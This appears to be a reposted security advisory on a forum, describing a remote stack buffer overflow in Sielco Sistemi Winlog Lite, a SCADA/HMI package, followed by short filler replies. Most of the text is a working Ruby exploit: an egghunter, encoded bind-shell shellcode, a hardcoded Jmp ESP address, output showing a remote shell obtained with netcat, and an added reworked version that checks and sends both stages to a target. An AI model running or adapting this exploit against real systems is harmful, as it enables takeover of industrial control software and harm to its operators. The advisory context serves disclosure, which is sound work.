
Sielco Sistemi Winlog Lite Buffer Overflow Vulnerability

Posted on 2012-10-30 18:10:27
Published: 2012-06-05
Updated: 2012-06-11
Affected systems:
sielcosistemi SIELCO SISTEMI Winlog Lite 2.07.14
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53811
Winlog Lite is the entry-level edition of Sielco Sistemi's SCADA/HMI software Winlog Pro, intended for evaluating the package's capabilities and ease of use, and also usable as a solution for building small supervisory applications.
Winlog Lite does not bound a buffer it receives over its TCP listener (port 46824 in the exploit below), producing a remote stack-based buffer overflow. An attacker who can reach the service can overwrite the saved return address and execute arbitrary code with the privileges of the Winlog Lite process.
<*Source: m1k3 (m1k3@s3cur1ty_de

  Links: http://www.securityfocus.com/archive/1/522974
         http://www.linuxidc.com/Linux/2012-06/62642.htm
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided only for security research and teaching. Users bear the risk themselves!
m1k3 () provided the following test method:
# - Exploit:
#root@bt:~/msf-scripts# ruby runtime-exploit-01.rb
#placing the shellcode
#sleeping ...
#kicking ...
#buffer length: 261
#root@bt:~/msf-scripts# netcat -v 10.8.28.37 4444
#10.8.28.37: inverse host lookup failed: Unknown server error : Connection timed out
#(UNKNOWN) [10.8.28.37] 4444 (?) open
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\All Users\Application Data\Winlog Lite\Projects\Ceramics Kiln\Template>
#
# Important:
# -> the reliability of your exploit depends on that path ...
# if you choose another default project or you start another project this path is not reliable anymore
# you can choose the default project on the installation. I have used Ceramics Kiln
require 'socket'
port = "46824"
host = "10.8.28.37"
s = TCPSocket.open(host,port)
sleep(0.5)
# 32-byte NtAccessCheckAndAuditAlarm egghunter; scans memory for the egg "wootwoot"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter << "\xef\xb8\x77\x6f\x6f\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
#msfpayload windows/shell_bind_tcp R | msfencode -t ruby
#
# x86/shikata_ga_nai succeeded with size 368 (iteration=1)
shellcode =
"\xdb\xc8\xd9\x74\x24\xf4\x5b\xba\x45\x76\x08\xf1\x33\xc9" +
"\xb1\x56\x31\x53\x18\x83\xeb\xfc\x03\x53\x51\x94\xfd\x0d" +
"\xb1\xd1\xfe\xed\x41\x82\x77\x08\x70\x90\xec\x58\x20\x24" +
"\x66\x0c\xc8\xcf\x2a\xa5\x5b\xbd\xe2\xca\xec\x08\xd5\xe5" +
"\xed\xbc\xd9\xaa\x2d\xde\xa5\xb0\x61\x00\x97\x7a\x74\x41" +
"\xd0\x67\x76\x13\x89\xec\x24\x84\xbe\xb1\xf4\xa5\x10\xbe" +
"\x44\xde\x15\x01\x30\x54\x17\x52\xe8\xe3\x5f\x4a\x83\xac" +
"\x7f\x6b\x40\xaf\xbc\x22\xed\x04\x36\xb5\x27\x55\xb7\x87" +
"\x07\x3a\x86\x27\x8a\x42\xce\x80\x74\x31\x24\xf3\x09\x42" +
"\xff\x89\xd5\xc7\xe2\x2a\x9e\x70\xc7\xcb\x73\xe6\x8c\xc0" +
"\x38\x6c\xca\xc4\xbf\xa1\x60\xf0\x34\x44\xa7\x70\x0e\x63" +
"\x63\xd8\xd5\x0a\x32\x84\xb8\x33\x24\x60\x65\x96\x2e\x83" +
"\x72\xa0\x6c\xcc\xb7\x9f\x8e\x0c\xdf\xa8\xfd\x3e\x40\x03" +
"\x6a\x73\x09\x8d\x6d\x74\x20\x69\xe1\x8b\xca\x8a\x2b\x48" +
"\x9e\xda\x43\x79\x9e\xb0\x93\x86\x4b\x16\xc4\x28\x23\xd7" +
"\xb4\x88\x93\xbf\xde\x06\xcc\xa0\xe0\xcc\x7b\xe7\x2e\x34" +
"\x28\x80\x52\xca\xdf\x0c\xda\x2c\xb5\xbc\x8a\xe7\x21\x7f" +
"\xe9\x3f\xd6\x80\xdb\x13\x4f\x17\x53\x7a\x57\x18\x64\xa8" +
"\xf4\xb5\xcc\x3b\x8e\xd5\xc8\x5a\x91\xf3\x78\x14\xaa\x94" +
"\xf3\x48\x79\x04\x03\x41\xe9\xa5\x96\x0e\xe9\xa0\x8a\x98" +
"\xbe\xe5\x7d\xd1\x2a\x18\x27\x4b\x48\xe1\xb1\xb4\xc8\x3e" +
"\x02\x3a\xd1\xb3\x3e\x18\xc1\x0d\xbe\x24\xb5\xc1\xe9\xf2" +
"\x63\xa4\x43\xb5\xdd\x7e\x3f\x1f\x89\x07\x73\xa0\xcf\x07" +
"\x5e\x56\x2f\xb9\x37\x2f\x50\x76\xd0\xa7\x29\x6a\x40\x47" +
"\xe0\x2e\x70\x02\xa8\x07\x19\xcb\x39\x1a\x44\xec\x94\x59" +
"\x71\x6f\x1c\x22\x86\x6f\x55\x27\xc2\x37\x86\x55\x5b\xd2" +
"\xa8\xca\x5c\xf7"
# stage 1: plant the egg and the bind-shell payload in process memory
puts "placing the shellcode"
buffer = "\x41" * 2000
buffer << "wootwoot" #egg
buffer << "\x90"
buffer << shellcode
buffer << "\x90" * 2000
print "buffer length: #{buffer.length}\r\n"
s.puts(buffer)
puts "sleeping ..."
sleep(5)
# stage 2: overflow the stack, return into Jmp ESP and land on the egghunter
puts "kicking ..."
buffer = "\x41" * 20 + "\x14" * 10 + "\x41" * 167
buffer << "\xdf\x53\x51\x40" #EIP -> Jmp ESP - Vclx40.bpl - 0x405153df
buffer << "\x90"
buffer << egghunter
buffer << "\x90" * (59 - egghunter.length)
print "buffer length: #{buffer.length}\r\n"
s.puts(buffer)
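The two-stage layout used by the exploit (one request plants the egg and payload, a second one overwrites EIP with a Jmp ESP and drops into the egghunter) is easy to get wrong by a byte, and a tag that does not match the egg makes the hunter scan memory forever. The Ruby below is an added example, not part of m1k3's exploit or the advisory: it rebuilds the same two buffers from computed offsets, packs the return address with pack('V') instead of hand-typed bytes, works on binary strings so bytesize rather than character count is measured, and checks the layout before anything is sent. The 197-byte offset, the 0x405153df Jmp ESP address and the "woot" tag are taken from the exploit above; the bad-character list and the placeholder payload are assumptions for illustration.

```ruby
require 'socket'

# Added example, not code from the advisory or from m1k3's exploit. Values taken
# from the exploit above: the 197-byte offset to EIP, the Jmp ESP address in
# Vclx40.bpl and the "woot" egg tag. The bad-character list and the placeholder
# payload used at the bottom are assumptions for illustration only.
EGG_TAG    = "woot".b                     # the egg is this tag written twice
JMP_ESP    = 0x405153df                   # Vclx40.bpl - Jmp ESP
EIP_OFFSET = 20 + 10 + 167                # "\x41"*20 + "\x14"*10 + "\x41"*167
STAGE2_LEN = 261                          # length the exploit reports for stage 2

# skape's NtAccessCheckAndAuditAlarm egghunter (32 bytes); the tag is the imm32
# of "mov eax, 0x746f6f77" (opcode b8 followed by the bytes of "woot").
EGGHUNTER = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" \
             "\xef\xb8\x77\x6f\x6f\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7").b

# Pull the 4-byte tag out of the hunter so stage 1 and stage 2 can be checked
# for agreement before sending.
def egghunter_tag(hunter = EGGHUNTER)
  i = hunter.index("\xb8".b)              # first "mov eax, imm32" opcode
  hunter.byteslice(i + 1, 4)
end

# Stage 1: padding, the egg (tag twice), a NOP, the payload, more padding. The
# first request leaves this in process memory for the hunter to find.
def build_stage1(shellcode, pad = 2000)
  "\x41".b * pad + EGG_TAG * 2 + "\x90".b + shellcode.b + "\x90".b * pad
end

# Stage 2: junk up to the saved return address, Jmp ESP, one NOP, then the
# hunter, padded with NOPs to the fixed length the exploit sends.
def build_stage2(ret_addr = JMP_ESP, hunter = EGGHUNTER, total = STAGE2_LEN)
  buf = "\x41".b * 20 + "\x14".b * 10 + "\x41".b * (EIP_OFFSET - 30)
  buf << [ret_addr].pack("V")             # little-endian dword
  buf << "\x90".b << hunter
  raise ArgumentError, "stage 2 is #{buf.bytesize} bytes, limit #{total}" if buf.bytesize > total
  buf << "\x90".b * (total - buf.bytesize)
end

# Bytes the target would mangle. Hypothetical list: the advisory names none,
# so replace it with what your own testing of the service shows.
def bad_chars(data, banned = "\x00\x0a\x0d".b)
  data.b.bytes.select { |byte| banned.bytes.include?(byte) }.uniq
end

# Every condition that must hold before the buffers go on the wire.
def check_layout(stage1, stage2, hunter = EGGHUNTER)
  tag = egghunter_tag(hunter)
  {
    tag_matches_egg:  tag == EGG_TAG,
    egg_in_stage1:    stage1.include?(tag * 2),       # hunter wants the tag twice
    eip_at_offset:    stage2.byteslice(EIP_OFFSET, 4) == [JMP_ESP].pack("V"),
    hunter_after_eip: stage2.byteslice(EIP_OFFSET + 5, hunter.bytesize) == hunter,
    stage2_length:    stage2.bytesize == STAGE2_LEN
  }
end

# Deliver both stages the way the exploit does (puts, so a newline follows each).
# Network-only; the offline checks above never call it.
def send_stages(host, port, stage1, stage2, delay = 5)
  s = TCPSocket.open(host, port)
  sleep(0.5)
  s.puts(stage1)
  sleep(delay)
  s.puts(stage2)
ensure
  s.close if s
end

if $PROGRAM_NAME == __FILE__ && ARGV.length == 2
  host, port = ARGV
  payload = "\xcc".b * 8        # placeholder (int3s); generate a real one with msfpayload/msfvenom
  stage1 = build_stage1(payload)
  stage2 = build_stage2
  checks = check_layout(stage1, stage2)
  abort "layout check failed: #{checks.inspect}" unless checks.values.all?
  bad = bad_chars(payload)
  abort "payload contains bad chars: #{bad.inspect}" unless bad.empty?
  send_stages(host, port.to_i, stage1, stage2)
end
```

Run it as `ruby stages.rb <host> 46824` to send; with no arguments it only defines the builders and checks, which is what makes the layout testable without a target. The binary-string handling matters: a Ruby string literal built from \x escapes carries the source encoding, so concatenating it with the ASCII-8BIT result of pack raises an encoding error, and length can count multi-byte sequences as one character.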
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
sielcosistemi
-------------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:
http://www.sielcosistemi.com/en/download/public/winlog_lite.html
Posted on 2012-11-3 12:41:17
Maybe, perhaps, probably so; then again, not necessarily.
Posted on 2012-11-8 02:23:34
Notice: the author has been banned or deleted; content automatically hidden.
Posted on 2012-11-10 03:22:25
Let me give this a bump for you.
Posted on 2014-11-4 21:40:17
People can because they believe they can.
Posted on 2014-11-17 17:09:03
Since I'm here, I'll leave a footprint.
Posted on 2014-12-5 03:37:19
Notice: the author has been banned or deleted; content automatically hidden.
Posted on 2014-12-28 09:18:18
Finally finished reading it~~~
Posted on 2015-1-28 05:14:28
Of all the easiest things in the world, putting things off takes the least effort.
Posted on 2015-3-2 03:23:40
The post above says nothing at all~~~